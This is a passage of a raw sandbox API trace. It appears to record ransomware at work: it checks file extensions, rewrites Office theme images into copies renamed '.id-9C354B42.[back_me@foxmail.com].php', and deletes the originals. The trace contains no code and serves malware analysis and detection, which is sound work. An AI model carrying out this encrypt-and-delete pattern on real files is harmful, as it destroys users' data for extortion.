lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0047.329] lstrlenW (lpString=".doc") returned 4 [0047.329] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.329] lstrlenW (lpString=".docx") returned 5 [0047.329] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.329] lstrlenW (lpString=".pdf") returned 4 [0047.329] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.329] lstrlenW (lpString=".xls") returned 4 [0047.329] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.329] lstrlenW (lpString=".xlsx") returned 5 [0047.329] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.329] lstrlenW (lpString=".ppt") returned 4 [0047.329] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0047.329] lstrlenW (lpString=".zip") returned 4 [0047.329] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.329] lstrlenW (lpString=".rar") returned 4 [0047.329] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.329] lstrlenW (lpString=".bz2") returned 4 [0047.329] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.329] lstrlenW (lpString=".7z") returned 3 [0047.329] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0047.329] lstrlenW (lpString=".dbf") returned 4 [0047.330] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0047.330] lstrlenW (lpString=".1cd") returned 4 [0047.330] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0047.330] lstrlenW (lpString=".jpg") returned 4 [0047.330] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0047.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0047.330] lstrlenW (lpString=".doc") returned 4 [0047.330] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.330] lstrlenW (lpString=".docx") returned 5 [0047.330] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.330] lstrlenW (lpString=".pdf") returned 4 [0047.330] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.330] lstrlenW (lpString=".xls") returned 4 [0047.330] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.330] lstrlenW (lpString=".xlsx") returned 5 [0047.330] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.330] lstrlenW (lpString=".ppt") returned 4 [0047.330] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0047.330] lstrlenW (lpString=".zip") returned 4 [0047.330] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.330] lstrlenW (lpString=".rar") returned 4 [0047.330] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.330] lstrlenW (lpString=".bz2") returned 4 [0047.330] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.330] lstrlenW (lpString=".7z") returned 3 [0047.330] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0047.330] lstrlenW (lpString=".dbf") returned 4 [0047.330] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0047.331] lstrlenW (lpString=".1cd") returned 4 [0047.331] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0047.331] lstrlenW (lpString=".jpg") returned 4 [0047.331] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.331] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0047.331] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0047.331] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.331] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=1379) returned 1 [0047.331] CloseHandle (hObject=0x210) returned 1 [0047.331] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif")) returned 0x20 [0047.331] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.331] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.332] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.332] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.332] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0047.634] GetLastError () returned 0x0 [0047.634] ReadFile (in: hFile=0x210, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x563, lpOverlapped=0x0) returned 1 [0047.638] WriteFile (in: hFile=0x1f8, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x570, lpOverlapped=0x0) returned 1 [0047.639] ReadFile (in: hFile=0x210, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.639] WriteFile (in: hFile=0x1f8, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.639] SetEndOfFile (hFile=0x1f8) returned 1 [0047.639] CloseHandle (hObject=0x1f8) returned 1 [0047.639] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.639] SetEndOfFile (hFile=0x210) returned 1 [0047.640] CloseHandle (hObject=0x210) returned 1 [0047.640] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0047.640] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif")) returned 1 [0047.641] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0047.641] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0047.641] lstrlenW (lpString=".doc") returned 4 [0047.641] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.641] lstrlenW (lpString=".docx") returned 5 [0047.641] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.641] lstrlenW (lpString=".pdf") returned 4 [0047.641] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.641] lstrlenW (lpString=".xls") returned 4 [0047.641] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.641] lstrlenW (lpString=".xlsx") returned 5 [0047.641] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.641] lstrlenW (lpString=".ppt") returned 4 [0047.641] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.641] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0047.641] lstrlenW (lpString=".zip") returned 4 [0047.641] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.641] lstrlenW (lpString=".rar") returned 4 [0047.641] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.641] lstrlenW (lpString=".bz2") returned 4 [0047.641] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.641] lstrlenW (lpString=".7z") returned 3 [0047.641] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.641] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0047.641] lstrlenW (lpString=".dbf") returned 4 [0047.641] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.641] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0047.641] lstrlenW (lpString=".1cd") returned 4 [0047.641] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.641] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0047.641] lstrlenW (lpString=".jpg") returned 4 [0047.641] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.642] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0047.642] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0047.642] lstrlenW (lpString=".doc") returned 4 [0047.642] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.642] lstrlenW (lpString=".docx") returned 5 [0047.642] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.642] lstrlenW (lpString=".pdf") returned 4 [0047.642] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.642] lstrlenW (lpString=".xls") returned 4 [0047.642] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.642] lstrlenW (lpString=".xlsx") returned 5 [0047.642] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.642] lstrlenW (lpString=".ppt") returned 4 [0047.642] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.642] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0047.642] lstrlenW (lpString=".zip") returned 4 [0047.642] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.642] lstrlenW (lpString=".rar") returned 4 [0047.642] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.642] lstrlenW (lpString=".bz2") returned 4 [0047.642] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.642] lstrlenW (lpString=".7z") returned 3 [0047.642] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.642] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0047.642] lstrlenW (lpString=".dbf") returned 4 [0047.642] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.642] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0047.642] lstrlenW (lpString=".1cd") returned 4 [0047.642] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.642] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0047.642] lstrlenW (lpString=".jpg") returned 4 [0047.642] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.643] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0047.643] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0047.643] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.643] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=1364) returned 1 [0047.643] CloseHandle (hObject=0x210) returned 1 [0047.643] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif")) returned 0x20 [0047.643] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.643] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.643] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.643] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.644] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0047.646] GetLastError () returned 0x0 [0047.646] ReadFile (in: hFile=0x210, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x554, lpOverlapped=0x0) returned 1 [0047.651] WriteFile (in: hFile=0x1f8, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x560, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x560, lpOverlapped=0x0) returned 1 [0047.652] ReadFile (in: hFile=0x210, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.652] WriteFile (in: hFile=0x1f8, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.652] SetEndOfFile (hFile=0x1f8) returned 1 [0047.652] CloseHandle (hObject=0x1f8) returned 1 [0047.652] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.652] SetEndOfFile (hFile=0x210) returned 1 [0047.653] CloseHandle (hObject=0x210) returned 1 [0047.653] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0047.653] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif")) returned 1 [0047.653] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0047.654] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0047.654] lstrlenW (lpString=".doc") returned 4 [0047.654] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.654] lstrlenW (lpString=".docx") returned 5 [0047.654] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.654] lstrlenW (lpString=".pdf") returned 4 [0047.654] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.654] lstrlenW (lpString=".xls") returned 4 [0047.654] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.654] lstrlenW (lpString=".xlsx") returned 5 [0047.654] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.654] lstrlenW (lpString=".ppt") returned 4 [0047.654] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.654] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0047.654] lstrlenW (lpString=".zip") returned 4 [0047.654] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.654] lstrlenW (lpString=".rar") returned 4 [0047.654] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.654] lstrlenW (lpString=".bz2") returned 4 [0047.654] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.654] lstrlenW (lpString=".7z") returned 3 [0047.654] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.654] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0047.654] lstrlenW (lpString=".dbf") returned 4 [0047.654] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.654] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0047.654] lstrlenW (lpString=".1cd") returned 4 [0047.654] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.654] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0047.654] lstrlenW (lpString=".jpg") returned 4 [0047.654] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.654] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0047.654] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0047.655] lstrlenW (lpString=".doc") returned 4 [0047.655] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.655] lstrlenW (lpString=".docx") returned 5 [0047.655] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.655] lstrlenW (lpString=".pdf") returned 4 [0047.655] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.655] lstrlenW (lpString=".xls") returned 4 [0047.655] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.655] lstrlenW (lpString=".xlsx") returned 5 [0047.655] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.655] lstrlenW (lpString=".ppt") returned 4 [0047.655] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.655] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0047.655] lstrlenW (lpString=".zip") returned 4 [0047.655] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.655] lstrlenW (lpString=".rar") returned 4 [0047.655] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.655] lstrlenW (lpString=".bz2") returned 4 [0047.655] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.655] lstrlenW (lpString=".7z") returned 3 [0047.655] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.655] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0047.655] lstrlenW (lpString=".dbf") returned 4 [0047.655] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.655] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0047.655] lstrlenW (lpString=".1cd") returned 4 [0047.655] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.655] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0047.655] lstrlenW (lpString=".jpg") returned 4 [0047.655] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.655] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0047.656] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0047.656] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.656] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=11573) returned 1 [0047.656] CloseHandle (hObject=0x210) returned 1 [0047.656] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png")) returned 0x20 [0047.656] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.656] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.656] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.656] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.656] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0047.657] GetLastError () returned 0x0 [0047.657] ReadFile (in: hFile=0x210, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x2d35, lpOverlapped=0x0) returned 1 [0047.660] WriteFile (in: hFile=0x1f8, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x2d40, lpOverlapped=0x0) returned 1 [0047.661] ReadFile (in: hFile=0x210, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.661] WriteFile (in: hFile=0x1f8, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.661] SetEndOfFile (hFile=0x1f8) returned 1 [0047.661] CloseHandle (hObject=0x1f8) returned 1 [0047.661] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.661] SetEndOfFile (hFile=0x210) returned 1 [0047.662] CloseHandle (hObject=0x210) returned 1 [0047.662] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0047.662] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png")) returned 1 [0047.663] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0047.663] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0047.663] lstrlenW (lpString=".doc") returned 4 [0047.663] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 